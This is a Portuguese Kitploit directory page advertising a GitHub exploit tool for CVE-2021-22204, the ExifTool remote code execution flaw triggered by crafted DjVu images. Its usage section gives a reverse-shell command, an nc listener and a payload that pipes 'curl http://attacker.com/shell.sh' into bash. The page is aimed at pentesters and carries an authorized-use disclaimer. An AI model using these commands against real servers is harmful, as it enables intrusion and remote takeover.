Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-22204 — Exploit de RCE no ExifTool (CVE-2021-22204) - versão melhorada, sem dependência do exiftool | Kitploit
Ferramentas/GitHubGitHub/d4ytox/cve-2021-22204
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubd4ytox/cve-2021-22204

CVE-2021-22204

Exploit de RCE no ExifTool (CVE-2021-22204) - versão melhorada, sem dependência do exiftool

Ver Repositório
há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-22204 - Execução de Código Arbitrário no ExifTool

Um exploit aprimorado para CVE-2021-22204, uma vulnerabilidade nas versões 7.44 a 12.23 do ExifTool que permite execução de código arbitrário ao processar arquivos DjVu maliciosos.

Descrição

A neutralização inadequada de dados do usuário no formato de arquivo DjVu nas versões 7.44 a 12.23 do ExifTool permite a execução de código arbitrário ao analisar uma imagem maliciosa. Este exploit gera um arquivo de imagem malicioso que, quando processado por uma versão vulnerável do ExifTool, executa código controlado pelo atacante.

Melhorias em Relação ao Original

Esta é uma versão atualizada inspirada em UNICORDev/exploit-CVE-2021-22204, com as seguintes melhorias:

  • Sem dependência do ExifTool na máquina do atacante - O exploit original usa exiftool -config para incorporar o payload, o que falha se seu ExifTool estiver corrigido (v12.24+). Esta versão cria um payload DjVu puro usando apenas djvumake.
  • Funciona no Kali moderno - Compatível com Python 3.12+ (corrige o aviso de sequência de escape \c)
  • Dependências mínimas - Requer apenas o pacote djvulibre-bin
  • Código limpo e mínimo - Sem arte ASCII ou atrasos artificiais

Requisitos

root@kitploit:~
sudo apt install djvulibre-bin

Uso

Shell Reverso:

root@kitploit:~
python3 exploit.py -s <LHOST> <LPORT>

Comando Personalizado:

root@kitploit:~
python3 exploit.py -c "id > /tmp/pwned"

Exemplos:

root@kitploit:~
# Gerar payload de shell reverso
python3 exploit.py -s 192.168.1.100 4444

# Gerar payload de execução de comando  
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"

# Iniciar listener e aguardar callback
nc -nlvp 4444

O exploit gera image.jpg - faça upload disso para um destino onde o ExifTool irá processá-lo.

Versões Afetadas

  • ExifTool 7.44 - 12.23

Referências

  • CVE-2021-22204
  • Aviso do ExifTool
  • Exploit Original do UNICORD

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizados.

O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta. Use este exploit apenas contra sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar.

O acesso não autorizado a sistemas de computador é ilegal e punível por lei. Use com responsabilidade.

Licença

Licença MIT - Veja o arquivo LICENSE.

Créditos

  • Conceito original do exploit por UNICORD (NicPWNs & Dev-Yeoj)
  • Versão atualizada por d4ytox
Baixar ferramenta